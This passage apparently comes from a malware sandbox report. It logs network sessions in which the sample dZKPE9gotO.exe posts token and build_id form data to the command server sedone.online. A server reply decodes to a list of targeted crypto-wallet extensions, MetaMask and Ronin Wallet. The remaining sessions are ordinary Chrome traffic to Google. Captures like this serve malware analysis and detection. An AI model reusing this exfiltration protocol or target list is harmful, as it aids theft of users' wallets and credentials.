                                                                                                                                                                                                                                                2024-12-16 14:39:43 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                6192.168.2.749728116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:44 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 6209
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:44 UTC6209OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------7QQIMOZMYUSRQI58G4WTCont
                                                                                                                                                                                                                                                2024-12-16 14:39:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:45 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                7192.168.2.749731116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:45 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 489
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:45 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------7QQIMOZMYUSRQI58G4WTCont
                                                                                                                                                                                                                                                2024-12-16 14:39:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                8192.168.2.749743172.217.21.364437704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:49 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:50 GMT
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-A01akOlsJuJLMtVpMHOofA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC124INData Raw: 38 31 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 61 72 72 79 20 6f 6e 20 6d 6f 76 69 65 73 22 2c 22 6d 69 63 68 69 67 61 6e 20 77 6f 6c 76 65 72 69 6e 65 73 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 63 61 6e 61 64 61 20 70 6f 73 74 61 6c 20 77 6f 72 6b 65 72 73 20 73 74 72 69 6b 65 22 2c 22 64 65 63 65 6d 62 65 72 20 66 75 6c 6c 20 6d 6f 6f 6e 20 63 6f 6c 64 20 6d 6f 6f 6e
                                                                                                                                                                                                                                                Data Ascii: 81a)]}'["",["carry on movies","michigan wolverines football","canada postal workers strike","december full moon cold moon
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC1390INData Raw: 22 2c 22 68 65 6c 6c 64 69 76 65 72 73 20 32 20 69 6c 6c 75 6d 69 6e 61 74 65 20 63 61 6c 79 70 73 6f 22 2c 22 77 77 65 20 73 61 74 75 72 64 61 79 20 6e 69 67 68 74 20 6d 61 69 6e 20 65 76 65 6e 74 22 2c 22 6c 6f 74 74 65 72 79 20 70 6f 77 65 72 62 61 6c 6c 20 6a 61 63 6b 70 6f 74 22 2c 22 67 65 6f 72 67 69 61 20 62 75 6c 6c 64 6f 67 73 20 66 6f 6f 74 62 61 6c 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a
                                                                                                                                                                                                                                                Data Ascii: ","helldivers 2 illuminate calypso","wwe saturday night main event","lottery powerball jackpot","georgia bulldogs football"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZ
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC567INData Raw: 46 52 55 55 5a 42 4e 46 42 4a 4e 6a 46 5a 52 45 6c 72 53 6c 4a 46 53 31 52 77 4e 7a 6b 30 59 6c 59 76 55 45 31 6d 4f 55 55 78 61 6e 56 78 56 6e 4a 6a 4d 55 34 78 5a 6d 46 61 59 30 38 31 54 47 74 36 53 58 42 68 59 6d 55 79 59 6c 42 46 64 30 5a 49 65 55 46 6a 63 44 5a 71 62 32 56 76 4e 31 5a 4b 57 57 46 33 64 54 68 79 52 31 4a 50 61 44 4e 51 62 6a 52 4b 64 46 70 77 62 54 6c 77 4f 57 78 52 62 48 52 43 52 30 35 70 5a 6a 64 57 5a 45 70 54 52 6e 41 31 65 44 6b 76 4e 6d 52 53 55 45 68 74 64 55 5a 30 52 33 6c 53 4e 6e 56 4f 52 54 55 7a 5a 6b 6c 72 63 53 74 69 62 6c 70 42 63 55 64 6f 4b 33 68 56 54 6b 52 52 4e 48 51 33 64 48 5a 45 54 48 56 31 63 44 63 72 62 54 49 35 63 57 74 7a 4e 44 6c 35 56 30 34 32 4f 48 56 42 5a 54 46 54 5a 31 64 5a 55 55 6b 32 53 6e 6c 52 63
                                                                                                                                                                                                                                                Data Ascii: FRUUZBNFBJNjFZRElrSlJFS1RwNzk0YlYvUE1mOUUxanVxVnJjMU4xZmFaY081TGt6SXBhYmUyYlBFd0ZIeUFjcDZqb2VvN1ZKWWF3dThyR1JPaDNQbjRKdFpwbTlwOWxRbHRCR05pZjdWZEpTRnA1eDkvNmRSUEhtdUZ0R3lSNnVORTUzZklrcStiblpBcUdoK3hVTkRRNHQ3dHZETHV1cDcrbTI5cWtzNDl5V042OHVBZTFTZ1dZUUk2SnlRc
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC89INData Raw: 35 33 0d 0a 33 64 48 68 6c 51 31 52 6e 59 30 5a 54 65 55 4a 34 4d 6e 46 50 61 6e 67 30 4d 55 67 34 4e 58 52 43 65 47 31 53 61 45 64 74 53 6a 68 6e 62 58 5a 7a 59 30 4d 30 57 45 52 45 4f 45 74 77 5a 43 39 61 4e 7a 52 4a 56 6a 52 73 4f 57 6c 6e 63 47 51 34 52 58 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 533dHhlQ1RnY0ZTeUJ4MnFPang0MUg4NXRCeG1SaEdtSjhnbXZzY0M0WEREOEtwZC9aNzRJVjRsOWlncGQ4RX
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC1390INData Raw: 31 66 32 37 0d 0a 42 45 51 32 6c 54 64 6d 4a 31 4d 6d 64 42 4e 55 70 34 65 6d 64 6b 63 57 4e 36 4f 56 4e 59 4e 48 55 77 53 46 6c 70 59 33 68 73 54 56 51 79 51 32 4e 4e 56 58 4d 79 52 31 42 71 56 6d 70 61 64 45 6c 32 56 32 46 68 63 56 46 70 4f 48 63 78 61 6e 63 77 51 6a 46 73 65 47 78 58 4d 56 4e 59 55 31 56 76 4d 30 52 51 55 58 46 43 53 44 4e 71 53 54 5a 46 4d 47 31 79 65 44 68 57 5a 7a 4a 4c 54 48 42 43 54 55 64 53 4f 45 6b 32 57 48 42 75 4e 58 4a 30 64 47 70 31 56 44 42 6f 4b 32 4e 72 59 57 63 77 61 33 45 30 54 33 52 4d 54 6a 4a 70 55 6a 51 33 55 6b 31 6b 61 55 38 79 65 58 52 6c 4d 48 42 48 51 32 74 45 63 56 4e 42 61 30 52 77 4d 46 4e 4e 4b 33 52 69 57 69 74 51 55 54 56 34 4e 55 78 70 56 45 4a 4b 61 31 70 68 5a 48 63 72 63 45 74 4c 62 47 74 74 54 32 74
                                                                                                                                                                                                                                                Data Ascii: 1f27BEQ2lTdmJ1MmdBNUp4emdkcWN6OVNYNHUwSFlpY3hsTVQyQ2NNVXMyR1BqVmpadEl2V2FhcVFpOHcxancwQjFseGxXMVNYU1VvM0RQUXFCSDNqSTZFMG1yeDhWZzJLTHBCTUdSOEk2WHBuNXJ0dGp1VDBoK2NrYWcwa3E0T3RMTjJpUjQ3Uk1kaU8yeXRlMHBHQ2tEcVNBa0RwMFNNK3RiWitQUTV4NUxpVEJKa1phZHcrcEtLbGttT2t
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC1390INData Raw: 4d 77 54 6a 64 4f 4d 6d 4e 4b 56 57 39 45 54 31 4e 6d 56 57 35 71 53 45 70 78 55 33 68 56 56 48 6b 79 4d 57 35 50 53 6b 78 74 61 6b 39 4f 57 55 39 6e 51 31 70 58 5a 6a 42 70 64 30 4e 42 51 32 39 73 62 58 5a 6a 61 58 70 79 59 31 5a 46 52 45 74 70 4e 32 70 6b 4e 47 30 33 63 30 4e 50 65 45 68 61 55 6a 59 77 4b 33 52 61 4b 32 46 52 4e 6c 4e 44 53 6e 6c 71 56 30 35 33 5a 47 78 33 65 58 42 6b 56 7a 41 78 55 57 78 4f 4e 32 74 36 63 6c 4e 46 53 6b 55 79 51 58 6c 35 4f 55 56 33 54 57 49 77 52 6e 42 48 4e 56 42 34 4d 30 67 31 4e 32 64 55 64 7a 4e 59 62 6a 42 75 52 6d 78 4c 62 6d 46 55 63 55 4a 6c 4e 33 51 76 52 46 42 31 62 6d 52 56 55 45 46 6a 4e 54 46 51 65 56 52 50 62 6b 46 4d 51 6a 64 47 51 30 74 56 4b 7a 68 4d 61 57 67 78 65 44 64 6a 61 30 56 30 54 6e 42 69 57
                                                                                                                                                                                                                                                Data Ascii: MwTjdOMmNKVW9ET1NmVW5qSEpxU3hVVHkyMW5PSkxtak9OWU9nQ1pXZjBpd0NBQ29sbXZjaXpyY1ZFREtpN2pkNG03c0NPeEhaUjYwK3RaK2FRNlNDSnlqV053ZGx3eXBkVzAxUWxON2t6clNFSkUyQXl5OUV3TWIwRnBHNVB4M0g1N2dUdzNYbjBuRmxLbmFUcUJlN3QvRFB1bmRVUEFjNTFQeVRPbkFMQjdGQ0tVKzhMaWgxeDdja0V0TnBiW
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC1390INData Raw: 43 4d 47 6c 4a 61 55 46 6b 53 48 67 34 61 30 74 45 55 58 4e 4b 51 31 6c 34 53 6e 67 34 5a 6b 78 55 4d 48 52 4e 56 46 55 7a 54 32 70 76 4e 6b 6c 35 63 79 39 53 52 44 67 30 55 58 70 52 4e 55 39 71 59 30 4a 44 5a 32 39 4c 52 46 46 33 54 6b 64 6e 4f 46 42 48 61 6d 4e 73 53 48 6c 56 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 4c 79 39 42 51 55 4a 46 53 55 46 46 51 55 46 52 51 55 31 43 53 57 64 42 51 30 56 52 52 55 52 46 55 55 67 76 65 45 46 42 59 6b 46 42 51 55 4e 42 64 30 56 43 51 56 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55
                                                                                                                                                                                                                                                Data Ascii: CMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYkFBQUNBd0VCQVFBQUFBQUFBQUFBQUFBQU
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC1390INData Raw: 48 68 78 4f 48 4e 72 4e 6d 68 70 4e 6a 67 34 54 43 74 6b 62 6b 64 6d 4d 43 39 76 51 6a 64 6d 56 46 56 31 4d 47 5a 45 4d 32 56 30 65 44 4e 44 4c 33 52 73 53 7a 4e 54 61 6d 6b 79 55 33 6c 36 56 47 4a 72 65 6e 4e 4a 5a 6c 5a 33 62 56 56 59 4d 6a 56 4b 57 47 6f 7a 4e 32 52 32 4e 30 64 58 59 33 5a 54 53 46 56 6a 55 46 68 4a 4d 6b 5a 77 63 58 4e 30 4e 6d 56 76 59 6b 74 30 52 45 73 32 56 6d 38 30 65 54 42 6f 53 6d 74 49 53 47 73 7a 64 55 39 42 55 44 56 48 61 6d 6b 78 65 44 46 6a 5a 6a 4a 36 59 6c 52 4b 55 46 6c 30 56 6e 4e 36 55 33 55 31 53 7a 52 6f 56 44 46 44 63 57 31 42 54 47 35 35 51 6d 70 4b 4b 32 38 77 64 48 5a 58 62 32 52 31 63 46 45 78 53 32 5a 77 54 6b 74 7a 61 6e 56 6c 59 6b 78 50 57 54 67 34 5a 53 74 6a 59 31 46 55 5a 7a 6c 6f 62 6b 64 51 54 33 52 79
                                                                                                                                                                                                                                                Data Ascii: HhxOHNrNmhpNjg4TCtkbkdmMC9vQjdmVFV1MGZEM2V0eDNDL3RsSzNTamkyU3l6VGJrenNJZlZ3bVVYMjVKWGozN2R2N0dXY3ZTSFVjUFhJMkZwcXN0NmVvYkt0REs2Vm80eTBoSmtISGszdU9BUDVHamkxeDFjZjJ6YlRKUFl0VnN6U3U1SzRoVDFDcW1BTG55QmpKK28wdHZXb2R1cFExS2ZwTktzanVlYkxPWTg4ZStjY1FUZzlobkdQT3Ry
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC1390INData Raw: 42 53 54 4e 7a 54 32 64 33 63 42 4d 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 67 6f 6f 67 6c 65 3a 65 6e 74 69 74 79 69 6e 66 6f 22 3a 22 43 67 6b 76 62 53 38 77 4e 32 74 69 63 44 55 53 44 55 5a 76 62 33 52 69 59 57 78 73 49 48 52 6c 59 57 30 79 39 67 70 6b 59 58 52 68 4f 6d 6c 74 59 57 64 6c 4c 33 42 75 5a 7a 74 69 59 58 4e 6c 4e 6a 51 73 61 56 5a 43 54 31 4a 33 4d 45 74 48 5a 32 39 42 51 55 46 42 54 6c 4e 56 61 45 56 56 5a 30 46 42 51 55 56 42 51 55 46 42 51 58 42 44 51 55 31 42 51 55 46 44 65 56 52 4f 4f 53 74 42 51 55 46 42 62 6a 46 43 54 56 5a 46 57 43 38 76 4c 7a 68 7a 53 32 6c 72 51 55 46 42 51 56 70 47 61 46 4e 30 63 6d 45 77 59 6b 64 43 5a 6a 59 72 64 6e 46 32 51 55 46 44 61 57 39 78
                                                                                                                                                                                                                                                Data Ascii: BSTNzT2d3cBM\u003d","zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wN2ticDUSDUZvb3RiYWxsIHRlYW0y9gpkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQUVBQUFBQXBDQU1BQUFDeVROOStBQUFBbjFCTVZFWC8vLzhzS2lrQUFBQVpGaFN0cmEwYkdCZjYrdnF2QUFDaW9x
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC1033INData Raw: 72 4c 31 55 30 62 45 64 78 4d 6b 4a 74 63 57 64 49 55 56 67 72 62 6b 30 33 62 55 74 4d 57 46 56 5a 56 32 70 6b 52 31 5a 75 55 33 64 57 57 54 4e 46 4d 58 63 34 57 6a 52 7a 62 48 42 4c 51 32 31 79 4e 33 6c 47 56 47 31 46 59 58 52 4a 55 6b 38 77 55 57 74 42 4d 53 39 4c 61 45 68 71 55 6b 4a 76 52 6b 6c 68 4d 6d 35 43 56 45 4d 78 51 58 56 36 65 6d 5a 4f 52 47 5a 58 64 30 70 6a 4f 47 6c 49 5a 58 70 56 54 44 51 78 63 57 34 78 51 54 56 52 5a 44 64 61 62 33 52 78 61 56 52 6d 4c 7a 6c 59 5a 6a 4e 45 51 6d 46 45 54 45 35 50 4e 57 68 68 4e 54 46 56 56 6a 6c 6d 4d 32 35 57 61 44 68 42 55 6d 46 59 55 46 6c 6b 4d 32 74 54 61 6b 39 47 53 58 42 54 4f 54 46 4c 62 6d 56 78 64 6e 4a 6a 59 54 68 49 63 31 64 69 4e 30 31 77 62 6b 52 51 52 7a 4a 32 57 43 73 76 56 6d 45 76 55 56
                                                                                                                                                                                                                                                Data Ascii: rL1U0bEdxMkJtcWdIUVgrbk03bUtMWFVZV2pkR1ZuU3dWWTNFMXc4WjRzbHBLQ21yN3lGVG1FYXRJUk8wUWtBMS9LaEhqUkJvRklhMm5CVEMxQXV6emZORGZXd0pjOGlIZXpVTDQxcW4xQTVRZDdab3RxaVRmLzlYZjNEQmFETE5PNWhhNTFVVjlmM25WaDhBUmFYUFlkM2tTak9GSXBTOTFLbmVxdnJjYThIc1diN01wbkRQRzJ2WCsvVmEvUV


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.749748172.217.21.364437704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:50 GMT
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
